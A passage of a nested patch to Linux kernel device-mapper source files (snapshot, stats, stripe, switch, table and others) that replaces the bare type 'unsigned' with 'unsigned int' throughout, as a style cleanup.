+ 	atomic_t recovery_in_flight;
+@@ -163,12 +163,12 @@ struct dm_region_hash *dm_region_hash_create(
+ 						     struct bio_list *bios),
+ 		void (*wakeup_workers)(void *context),
+ 		void (*wakeup_all_recovery_waiters)(void *context),
+-		sector_t target_begin, unsigned max_recovery,
++		sector_t target_begin, unsigned int max_recovery,
+ 		struct dm_dirty_log *log, uint32_t region_size,
+ 		region_t nr_regions)
+ {
+ 	struct dm_region_hash *rh;
+-	unsigned nr_buckets, max_buckets;
++	unsigned int nr_buckets, max_buckets;
+ 	size_t i;
+ 	int ret;
+ 
+@@ -236,7 +236,7 @@ EXPORT_SYMBOL_GPL(dm_region_hash_create);
+ 
+ void dm_region_hash_destroy(struct dm_region_hash *rh)
+ {
+-	unsigned h;
++	unsigned int h;
+ 	struct dm_region *reg, *nreg;
+ 
+ 	BUG_ON(!list_empty(&rh->quiesced_regions));
+@@ -263,9 +263,9 @@ struct dm_dirty_log *dm_rh_dirty_log(struct dm_region_hash *rh)
+ }
+ EXPORT_SYMBOL_GPL(dm_rh_dirty_log);
+ 
+-static unsigned rh_hash(struct dm_region_hash *rh, region_t region)
++static unsigned int rh_hash(struct dm_region_hash *rh, region_t region)
+ {
+-	return (unsigned) ((region * rh->prime) >> rh->shift) & rh->mask;
++	return (unsigned int) ((region * rh->prime) >> rh->shift) & rh->mask;
+ }
+ 
+ static struct dm_region *__rh_lookup(struct dm_region_hash *rh, region_t region)
+diff --git a/drivers/md/dm-rq.c b/drivers/md/dm-rq.c
+index a41209a43506c..80f46e01bca44 100644
+--- a/drivers/md/dm-rq.c
++++ b/drivers/md/dm-rq.c
+@@ -23,33 +23,33 @@ struct dm_rq_target_io {
+ 	union map_info info;
+ 	struct dm_stats_aux stats_aux;
+ 	unsigned long duration_jiffies;
+-	unsigned n_sectors;
+-	unsigned completed;
++	unsigned int n_sectors;
++	unsigned int completed;
+ };
+ 
+ #define DM_MQ_NR_HW_QUEUES 1
+ #define DM_MQ_QUEUE_DEPTH 2048
+-static unsigned dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
+-static unsigned dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
++static unsigned int dm_mq_nr_hw_queues = DM_MQ_NR_HW_QUEUES;
++static unsigned int dm_mq_queue_depth = DM_MQ_QUEUE_DEPTH;
+ 
+ /*
+  * Request-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_REQUEST_BASED_IOS	256
+-static unsigned reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
++static unsigned int reserved_rq_based_ios = RESERVED_REQUEST_BASED_IOS;
+ 
+-unsigned dm_get_reserved_rq_based_ios(void)
++unsigned int dm_get_reserved_rq_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_rq_based_ios,
+ 				     RESERVED_REQUEST_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ 
+-static unsigned dm_get_blk_mq_nr_hw_queues(void)
++static unsigned int dm_get_blk_mq_nr_hw_queues(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_nr_hw_queues, 1, 32);
+ }
+ 
+-static unsigned dm_get_blk_mq_queue_depth(void)
++static unsigned int dm_get_blk_mq_queue_depth(void)
+ {
+ 	return __dm_get_module_param(&dm_mq_queue_depth,
+ 				     DM_MQ_QUEUE_DEPTH, BLK_MQ_MAX_DEPTH);
+diff --git a/drivers/md/dm-rq.h b/drivers/md/dm-rq.h
+index 1eea0da641db5..2c97ad1451400 100644
+--- a/drivers/md/dm-rq.h
++++ b/drivers/md/dm-rq.h
+@@ -38,7 +38,7 @@ void dm_stop_queue(struct request_queue *q);
+ 
+ void dm_mq_kick_requeue_list(struct mapped_device *md);
+ 
+-unsigned dm_get_reserved_rq_based_ios(void);
++unsigned int dm_get_reserved_rq_based_ios(void);
+ 
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_show(struct mapped_device *md, char *buf);
+ ssize_t dm_attr_rq_based_seq_io_merge_deadline_store(struct mapped_device *md,
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 680cc05ec6542..5176810f5d243 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -303,7 +303,7 @@ static int read_header(struct pstore *ps, int *new_snapshot)
+ {
+ 	int r;
+ 	struct disk_header *dh;
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 	int chunk_size_supplied = 1;
+ 	char *chunk_err;
+ 
+@@ -895,11 +895,11 @@ err_workqueue:
+ 	return r;
+ }
+ 
+-static unsigned persistent_status(struct dm_exception_store *store,
++static unsigned int persistent_status(struct dm_exception_store *store,
+ 				  status_type_t status, char *result,
+-				  unsigned maxlen)
++				  unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-snap-transient.c b/drivers/md/dm-snap-transient.c
+index 0e0ae4c36b374..d83a0565bd101 100644
+--- a/drivers/md/dm-snap-transient.c
++++ b/drivers/md/dm-snap-transient.c
+@@ -84,11 +84,11 @@ static int transient_ctr(struct dm_exception_store *store, char *options)
+ 	return 0;
+ }
+ 
+-static unsigned transient_status(struct dm_exception_store *store,
++static unsigned int transient_status(struct dm_exception_store *store,
+ 				 status_type_t status, char *result,
+-				 unsigned maxlen)
++				 unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	switch (status) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-snap.c b/drivers/md/dm-snap.c
+index d1c2f84d27e36..c64d987c544d7 100644
+--- a/drivers/md/dm-snap.c
++++ b/drivers/md/dm-snap.c
+@@ -41,7 +41,7 @@ static const char dm_snapshot_merge_target_name[] = "snapshot-merge";
+ 
+ struct dm_exception_table {
+ 	uint32_t hash_mask;
+-	unsigned hash_shift;
++	unsigned int hash_shift;
+ 	struct hlist_bl_head *table;
+ };
+ 
+@@ -106,7 +106,7 @@ struct dm_snapshot {
+ 	/* The on disk metadata handler */
+ 	struct dm_exception_store *store;
+ 
+-	unsigned in_progress;
++	unsigned int in_progress;
+ 	struct wait_queue_head in_progress_wait;
+ 
+ 	struct dm_kcopyd_client *kcopyd_client;
+@@ -161,7 +161,7 @@ struct dm_snapshot {
+  */
+ #define DEFAULT_COW_THRESHOLD 2048
+ 
+-static unsigned cow_threshold = DEFAULT_COW_THRESHOLD;
++static unsigned int cow_threshold = DEFAULT_COW_THRESHOLD;
+ module_param_named(snapshot_cow_threshold, cow_threshold, uint, 0644);
+ MODULE_PARM_DESC(snapshot_cow_threshold, "Maximum number of chunks being copied on write");
+ 
+@@ -324,7 +324,7 @@ struct origin {
+ struct dm_origin {
+ 	struct dm_dev *dev;
+ 	struct dm_target *ti;
+-	unsigned split_boundary;
++	unsigned int split_boundary;
+ 	struct list_head hash_list;
+ };
+ 
+@@ -377,7 +377,7 @@ static void exit_origin_hash(void)
+ 	kfree(_dm_origins);
+ }
+ 
+-static unsigned origin_hash(struct block_device *bdev)
++static unsigned int origin_hash(struct block_device *bdev)
+ {
+ 	return bdev->bd_dev & ORIGIN_MASK;
+ }
+@@ -652,7 +652,7 @@ static void dm_exception_table_unlock(struct dm_exception_table_lock *lock)
+ }
+ 
+ static int dm_exception_table_init(struct dm_exception_table *et,
+-				   uint32_t size, unsigned hash_shift)
++				   uint32_t size, unsigned int hash_shift)
+ {
+ 	unsigned int i;
+ 
+@@ -850,7 +850,7 @@ static int dm_add_exception(void *context, chunk_t old, chunk_t new)
+ static uint32_t __minimum_chunk_size(struct origin *o)
+ {
+ 	struct dm_snapshot *snap;
+-	unsigned chunk_size = rounddown_pow_of_two(UINT_MAX);
++	unsigned int chunk_size = rounddown_pow_of_two(UINT_MAX);
+ 
+ 	if (o)
+ 		list_for_each_entry(snap, &o->snapshots, list)
+@@ -1010,7 +1010,7 @@ out:
+ }
+ 
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned chunk_size);
++			       sector_t sector, unsigned int chunk_size);
+ 
+ static void merge_callback(int read_err, unsigned long write_err,
+ 			   void *context);
+@@ -1183,7 +1183,7 @@ static int parse_snapshot_features(struct dm_arg_set *as, struct dm_snapshot *s,
+ 				   struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -1241,7 +1241,7 @@ static int snapshot_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	int r = -EINVAL;
+ 	char *origin_path, *cow_path;
+ 	dev_t origin_dev, cow_dev;
+-	unsigned args_used, num_flush_bios = 1;
++	unsigned int args_used, num_flush_bios = 1;
+ 	fmode_t origin_mode = FMODE_READ;
+ 
+ 	if (argc < 4) {
+@@ -2315,11 +2315,11 @@ static void snapshot_merge_resume(struct dm_target *ti)
+ }
+ 
+ static void snapshot_status(struct dm_target *ti, status_type_t type,
+-			    unsigned status_flags, char *result, unsigned maxlen)
++			    unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_snapshot *snap = ti->private;
+-	unsigned num_features;
++	unsigned int num_features;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -2592,7 +2592,7 @@ again:
+  * size must be a multiple of merging_snap's chunk_size.
+  */
+ static int origin_write_extent(struct dm_snapshot *merging_snap,
+-			       sector_t sector, unsigned size)
++			       sector_t sector, unsigned int size)
+ {
+ 	int must_wait = 0;
+ 	sector_t n;
+@@ -2668,7 +2668,7 @@ static void origin_dtr(struct dm_target *ti)
+ static int origin_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct dm_origin *o = ti->private;
+-	unsigned available_sectors;
++	unsigned int available_sectors;
+ 
+ 	bio_set_dev(bio, o->dev->bdev);
+ 
+@@ -2679,7 +2679,7 @@ static int origin_map(struct dm_target *ti, struct bio *bio)
+ 		return DM_MAPIO_REMAPPED;
+ 
+ 	available_sectors = o->split_boundary -
+-		((unsigned)bio->bi_iter.bi_sector & (o->split_boundary - 1));
++		((unsigned int)bio->bi_iter.bi_sector & (o->split_boundary - 1));
+ 
+ 	if (bio_sectors(bio) > available_sectors)
+ 		dm_accept_partial_bio(bio, available_sectors);
+@@ -2713,7 +2713,7 @@ static void origin_postsuspend(struct dm_target *ti)
+ }
+ 
+ static void origin_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_origin *o = ti->private;
+ 
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index d12ba9bce145d..7eeb3c2a2492b 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -42,12 +42,12 @@ struct dm_stat_shared {
+ struct dm_stat {
+ 	struct list_head list_entry;
+ 	int id;
+-	unsigned stat_flags;
++	unsigned int stat_flags;
+ 	size_t n_entries;
+ 	sector_t start;
+ 	sector_t end;
+ 	sector_t step;
+-	unsigned n_histogram_entries;
++	unsigned int n_histogram_entries;
+ 	unsigned long long *histogram_boundaries;
+ 	const char *program_id;
+ 	const char *aux_data;
+@@ -63,7 +63,7 @@ struct dm_stat {
+ 
+ struct dm_stats_last_position {
+ 	sector_t last_sector;
+-	unsigned last_rw;
++	unsigned int last_rw;
+ };
+ 
+ /*
+@@ -255,8 +255,8 @@ static void dm_stats_recalc_precise_timestamps(struct dm_stats *stats)
+ }
+ 
+ static int dm_stats_create(struct dm_stats *stats, sector_t start, sector_t end,
+-			   sector_t step, unsigned stat_flags,
+-			   unsigned n_histogram_entries,
++			   sector_t step, unsigned int stat_flags,
++			   unsigned int n_histogram_entries,
+ 			   unsigned long long *histogram_boundaries,
+ 			   const char *program_id, const char *aux_data,
+ 			   void (*suspend_callback)(struct mapped_device *),
+@@ -475,11 +475,11 @@ do_sync_free:
+ }
+ 
+ static int dm_stats_list(struct dm_stats *stats, const char *program,
+-			 char *result, unsigned maxlen)
++			 char *result, unsigned int maxlen)
+ {
+ 	struct dm_stat *s;
+ 	sector_t len;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 
+ 	/*
+ 	 * Output format:
+@@ -499,7 +499,7 @@ static int dm_stats_list(struct dm_stats *stats, const char *program,
+ 			if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 				DMEMIT(" precise_timestamps");
+ 			if (s->n_histogram_entries) {
+-				unsigned i;
++				unsigned int i;
+ 				DMEMIT(" histogram:");
+ 				for (i = 0; i < s->n_histogram_entries; i++) {
+ 					if (i)
+@@ -523,7 +523,7 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	 * This is racy, but so is part_round_stats_single.
+ 	 */
+ 	unsigned long long now, difference;
+-	unsigned in_flight_read, in_flight_write;
++	unsigned int in_flight_read, in_flight_write;
+ 
+ 	if (likely(!(s->stat_flags & STAT_PRECISE_TIMESTAMPS)))
+ 		now = jiffies;
+@@ -534,8 +534,8 @@ static void dm_stat_round(struct dm_stat *s, struct dm_stat_shared *shared,
+ 	if (!difference)
+ 		return;
+ 
+-	in_flight_read = (unsigned)atomic_read(&shared->in_flight[READ]);
+-	in_flight_write = (unsigned)atomic_read(&shared->in_flight[WRITE]);
++	in_flight_read = (unsigned int)atomic_read(&shared->in_flight[READ]);
++	in_flight_write = (unsigned int)atomic_read(&shared->in_flight[WRITE]);
+ 	if (in_flight_read)
+ 		p->io_ticks[READ] += difference;
+ 	if (in_flight_write)
+@@ -596,9 +596,9 @@ static void dm_stat_for_entry(struct dm_stat *s, size_t entry,
+ 			duration = stats_aux->duration_ns;
+ 		}
+ 		if (s->n_histogram_entries) {
+-			unsigned lo = 0, hi = s->n_histogram_entries + 1;
++			unsigned int lo = 0, hi = s->n_histogram_entries + 1;
+ 			while (lo + 1 < hi) {
+-				unsigned mid = (lo + hi) / 2;
++				unsigned int mid = (lo + hi) / 2;
+ 				if (s->histogram_boundaries[mid - 1] > duration) {
+ 					hi = mid;
+ 				} else {
+@@ -656,7 +656,7 @@ static void __dm_stat_bio(struct dm_stat *s, int bi_rw,
+ }
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *stats_aux)
+ {
+@@ -745,7 +745,7 @@ static void __dm_stat_init_temporary_percpu_totals(struct dm_stat_shared *shared
+ 		shared->tmp.io_ticks_total += READ_ONCE(p->io_ticks_total);
+ 		shared->tmp.time_in_queue += READ_ONCE(p->time_in_queue);
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++)
+ 				shared->tmp.histogram[i] += READ_ONCE(p->histogram[i]);
+ 		}
+@@ -779,7 +779,7 @@ static void __dm_stat_clear(struct dm_stat *s, size_t idx_start, size_t idx_end,
+ 		p->time_in_queue -= shared->tmp.time_in_queue;
+ 		local_irq_enable();
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				local_irq_disable();
+ 				p = &s->stat_percpu[smp_processor_id()][x];
+@@ -816,7 +816,7 @@ static int dm_stats_clear(struct dm_stats *stats, int id)
+ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long long j)
+ {
+ 	unsigned long long result;
+-	unsigned mult;
++	unsigned int mult;
+ 
+ 	if (s->stat_flags & STAT_PRECISE_TIMESTAMPS)
+ 		return j;
+@@ -836,9 +836,9 @@ static unsigned long long dm_jiffies_to_msec64(struct dm_stat *s, unsigned long
+ 
+ static int dm_stats_print(struct dm_stats *stats, int id,
+ 			  size_t idx_start, size_t idx_len,
+-			  bool clear, char *result, unsigned maxlen)
++			  bool clear, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct dm_stat *s;
+ 	size_t x;
+ 	sector_t start, end, step;
+@@ -894,7 +894,7 @@ static int dm_stats_print(struct dm_stats *stats, int id,
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[READ]),
+ 		       dm_jiffies_to_msec64(s, shared->tmp.io_ticks[WRITE]));
+ 		if (s->n_histogram_entries) {
+-			unsigned i;
++			unsigned int i;
+ 			for (i = 0; i < s->n_histogram_entries + 1; i++) {
+ 				DMEMIT("%s%llu", !i ? " " : ":", shared->tmp.histogram[i]);
+ 			}
+@@ -943,11 +943,11 @@ static int dm_stats_set_aux(struct dm_stats *stats, int id, const char *aux_data
+ 	return 0;
+ }
+ 
+-static int parse_histogram(const char *h, unsigned *n_histogram_entries,
++static int parse_histogram(const char *h, unsigned int *n_histogram_entries,
+ 			   unsigned long long **histogram_boundaries)
+ {
+ 	const char *q;
+-	unsigned n;
++	unsigned int n;
+ 	unsigned long long last;
+ 
+ 	*n_histogram_entries = 1;
+@@ -982,23 +982,23 @@ static int parse_histogram(const char *h, unsigned *n_histogram_entries,
+ }
+ 
+ static int message_stats_create(struct mapped_device *md,
+-				unsigned argc, char **argv,
+-				char *result, unsigned maxlen)
++				unsigned int argc, char **argv,
++				char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	int id;
+ 	char dummy;
+ 	unsigned long long start, end, len, step;
+-	unsigned divisor;
++	unsigned int divisor;
+ 	const char *program_id, *aux_data;
+-	unsigned stat_flags = 0;
++	unsigned int stat_flags = 0;
+ 
+-	unsigned n_histogram_entries = 0;
++	unsigned int n_histogram_entries = 0;
+ 	unsigned long long *histogram_boundaries = NULL;
+ 
+ 	struct dm_arg_set as, as_backup;
+ 	const char *a;
+-	unsigned feature_args;
++	unsigned int feature_args;
+ 
+ 	/*
+ 	 * Input format:
+@@ -1107,7 +1107,7 @@ ret:
+ }
+ 
+ static int message_stats_delete(struct mapped_device *md,
+-				unsigned argc, char **argv)
++				unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1122,7 +1122,7 @@ static int message_stats_delete(struct mapped_device *md,
+ }
+ 
+ static int message_stats_clear(struct mapped_device *md,
+-			       unsigned argc, char **argv)
++			       unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1137,8 +1137,8 @@ static int message_stats_clear(struct mapped_device *md,
+ }
+ 
+ static int message_stats_list(struct mapped_device *md,
+-			      unsigned argc, char **argv,
+-			      char *result, unsigned maxlen)
++			      unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	const char *program = NULL;
+@@ -1160,8 +1160,8 @@ static int message_stats_list(struct mapped_device *md,
+ }
+ 
+ static int message_stats_print(struct mapped_device *md,
+-			       unsigned argc, char **argv, bool clear,
+-			       char *result, unsigned maxlen)
++			       unsigned int argc, char **argv, bool clear,
++			       char *result, unsigned int maxlen)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1187,7 +1187,7 @@ static int message_stats_print(struct mapped_device *md,
+ }
+ 
+ static int message_stats_set_aux(struct mapped_device *md,
+-				 unsigned argc, char **argv)
++				 unsigned int argc, char **argv)
+ {
+ 	int id;
+ 	char dummy;
+@@ -1201,8 +1201,8 @@ static int message_stats_set_aux(struct mapped_device *md,
+ 	return dm_stats_set_aux(dm_get_stats(md), id, argv[2]);
+ }
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen)
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index ee32b099f1cf7..c6728c8b41594 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -26,11 +26,11 @@ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+ 
+-int dm_stats_message(struct mapped_device *md, unsigned argc, char **argv,
+-		     char *result, unsigned maxlen);
++int dm_stats_message(struct mapped_device *md, unsigned int argc, char **argv,
++		     char *result, unsigned int maxlen);
+ 
+ void dm_stats_account_io(struct dm_stats *stats, unsigned long bi_rw,
+-			 sector_t bi_sector, unsigned bi_sectors, bool end,
++			 sector_t bi_sector, unsigned int bi_sectors, bool end,
+ 			 unsigned long start_time,
+ 			 struct dm_stats_aux *aux);
+ 
+diff --git a/drivers/md/dm-stripe.c b/drivers/md/dm-stripe.c
+index baa085cc67bde..a81ed080730a7 100644
+--- a/drivers/md/dm-stripe.c
++++ b/drivers/md/dm-stripe.c
+@@ -273,7 +273,7 @@ static int stripe_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	uint32_t stripe;
+-	unsigned target_bio_nr;
++	unsigned int target_bio_nr;
+ 
+ 	if (bio->bi_opf & REQ_PREFLUSH) {
+ 		target_bio_nr = dm_bio_get_target_bio_nr(bio);
+@@ -359,7 +359,7 @@ static size_t stripe_dax_recovery_write(struct dm_target *ti, pgoff_t pgoff,
+  */
+ 
+ static void stripe_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct stripe_c *sc = (struct stripe_c *) ti->private;
+ 	unsigned int sz = 0;
+@@ -406,7 +406,7 @@ static void stripe_status(struct dm_target *ti, status_type_t type,
+ static int stripe_end_io(struct dm_target *ti, struct bio *bio,
+ 		blk_status_t *error)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	char major_minor[16];
+ 	struct stripe_c *sc = ti->private;
+ 
+@@ -444,7 +444,7 @@ static int stripe_iterate_devices(struct dm_target *ti,
+ {
+ 	struct stripe_c *sc = ti->private;
+ 	int ret = 0;
+-	unsigned i = 0;
++	unsigned int i = 0;
+ 
+ 	do {
+ 		ret = fn(ti, sc->stripe[i].dev,
+@@ -459,7 +459,7 @@ static void stripe_io_hints(struct dm_target *ti,
+ 			    struct queue_limits *limits)
+ {
+ 	struct stripe_c *sc = ti->private;
+-	unsigned chunk_size = sc->chunk_size << SECTOR_SHIFT;
++	unsigned int chunk_size = sc->chunk_size << SECTOR_SHIFT;
+ 
+ 	blk_limits_io_min(limits, chunk_size);
+ 	blk_limits_io_opt(limits, chunk_size * sc->stripes);
+diff --git a/drivers/md/dm-switch.c b/drivers/md/dm-switch.c
+index 534dc2ca8bb06..f734b5a097443 100644
+--- a/drivers/md/dm-switch.c
++++ b/drivers/md/dm-switch.c
+@@ -38,9 +38,9 @@ struct switch_path {
+ struct switch_ctx {
+ 	struct dm_target *ti;
+ 
+-	unsigned nr_paths;		/* Number of paths in path_list. */
++	unsigned int nr_paths;		/* Number of paths in path_list. */
+ 
+-	unsigned region_size;		/* Region size in 512-byte sectors */
++	unsigned int region_size;		/* Region size in 512-byte sectors */
+ 	unsigned long nr_regions;	/* Number of regions making up the device */
+ 	signed char region_size_bits;	/* log2 of region_size or -1 */
+ 
+@@ -56,8 +56,8 @@ struct switch_ctx {
+ 	struct switch_path path_list[];
+ };
+ 
+-static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_paths,
+-					   unsigned region_size)
++static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned int nr_paths,
++					   unsigned int region_size)
+ {
+ 	struct switch_ctx *sctx;
+ 
+@@ -73,7 +73,7 @@ static struct switch_ctx *alloc_switch_ctx(struct dm_target *ti, unsigned nr_pat
+ 	return sctx;
+ }
+ 
+-static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
++static int alloc_region_table(struct dm_target *ti, unsigned int nr_paths)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t nr_regions = ti->len;
+@@ -124,7 +124,7 @@ static int alloc_region_table(struct dm_target *ti, unsigned nr_paths)
+ }
+ 
+ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr,
+-				unsigned long *region_index, unsigned *bit)
++				unsigned long *region_index, unsigned int *bit)
+ {
+ 	if (sctx->region_entries_per_slot_bits >= 0) {
+ 		*region_index = region_nr >> sctx->region_entries_per_slot_bits;
+@@ -137,10 +137,10 @@ static void switch_get_position(struct switch_ctx *sctx, unsigned long region_nr
+ 	*bit *= sctx->region_table_entry_bits;
+ }
+ 
+-static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
++static unsigned int switch_region_table_read(struct switch_ctx *sctx, unsigned long region_nr)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+ 
+@@ -151,9 +151,9 @@ static unsigned switch_region_table_read(struct switch_ctx *sctx, unsigned long
+ /*
+  * Find which path to use at given offset.
+  */
+-static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
++static unsigned int switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ {
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 	sector_t p;
+ 
+ 	p = offset;
+@@ -172,10 +172,10 @@ static unsigned switch_get_path_nr(struct switch_ctx *sctx, sector_t offset)
+ }
+ 
+ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long region_nr,
+-				      unsigned value)
++				      unsigned int value)
+ {
+ 	unsigned long region_index;
+-	unsigned bit;
++	unsigned int bit;
+ 	region_table_slot_t pte;
+ 
+ 	switch_get_position(sctx, region_nr, &region_index, &bit);
+@@ -191,7 +191,7 @@ static void switch_region_table_write(struct switch_ctx *sctx, unsigned long reg
+  */
+ static void initialise_region_table(struct switch_ctx *sctx)
+ {
+-	unsigned path_nr = 0;
++	unsigned int path_nr = 0;
+ 	unsigned long region_nr;
+ 
+ 	for (region_nr = 0; region_nr < sctx->nr_regions; region_nr++) {
+@@ -249,7 +249,7 @@ static void switch_dtr(struct dm_target *ti)
+  * Optional args are to allow for future extension: currently this
+  * parameter must be 0.
+  */
+-static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int switch_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	static const struct dm_arg _args[] = {
+ 		{1, (KMALLOC_MAX_SIZE - sizeof(struct switch_ctx)) / sizeof(struct switch_path), "Invalid number of paths"},
+@@ -259,7 +259,7 @@ static int switch_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	struct switch_ctx *sctx;
+ 	struct dm_arg_set as;
+-	unsigned nr_paths, region_size, nr_optional_args;
++	unsigned int nr_paths, region_size, nr_optional_args;
+ 	int r;
+ 
+ 	as.argc = argc;
+@@ -320,7 +320,7 @@ static int switch_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+ 	sector_t offset = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-	unsigned path_nr = switch_get_path_nr(sctx, offset);
++	unsigned int path_nr = switch_get_path_nr(sctx, offset);
+ 
+ 	bio_set_dev(bio, sctx->path_list[path_nr].dmdev->bdev);
+ 	bio->bi_iter.bi_sector = sctx->path_list[path_nr].start + offset;
+@@ -371,9 +371,9 @@ static __always_inline unsigned long parse_hex(const char **string)
+ }
+ 
+ static int process_set_region_mappings(struct switch_ctx *sctx,
+-				       unsigned argc, char **argv)
++				       unsigned int argc, char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	unsigned long region_index = 0;
+ 
+ 	for (i = 1; i < argc; i++) {
+@@ -466,8 +466,8 @@ static int process_set_region_mappings(struct switch_ctx *sctx,
+  *
+  * Only set_region_mappings is supported.
+  */
+-static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+-			  char *result, unsigned maxlen)
++static int switch_message(struct dm_target *ti, unsigned int argc, char **argv,
++			  char *result, unsigned int maxlen)
+ {
+ 	static DEFINE_MUTEX(message_mutex);
+ 
+@@ -487,10 +487,10 @@ static int switch_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void switch_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	int path_nr;
+ 
+ 	switch (type) {
+@@ -519,7 +519,7 @@ static void switch_status(struct dm_target *ti, status_type_t type,
+ static int switch_prepare_ioctl(struct dm_target *ti, struct block_device **bdev)
+ {
+ 	struct switch_ctx *sctx = ti->private;
+-	unsigned path_nr;
++	unsigned int path_nr;
+ 
+ 	path_nr = switch_get_path_nr(sctx, 0);
+ 
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 078da18bb86d8..32b2d3b99d786 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -126,7 +126,7 @@ static int alloc_targets(struct dm_table *t, unsigned int num)
+ }
+ 
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md)
++		    unsigned int num_targets, struct mapped_device *md)
+ {
+ 	struct dm_table *t = kzalloc(sizeof(*t), GFP_KERNEL);
+ 
+@@ -470,10 +470,10 @@ static int adjoin(struct dm_table *t, struct dm_target *ti)
+  * On the other hand, dm-switch needs to process bulk data using messages and
+  * excessive use of GFP_NOIO could cause trouble.
+  */
+-static char **realloc_argv(unsigned *size, char **old_argv)
++static char **realloc_argv(unsigned int *size, char **old_argv)
+ {
+ 	char **argv;
+-	unsigned new_size;
++	unsigned int new_size;
+ 	gfp_t gfp;
+ 
+ 	if (*size) {
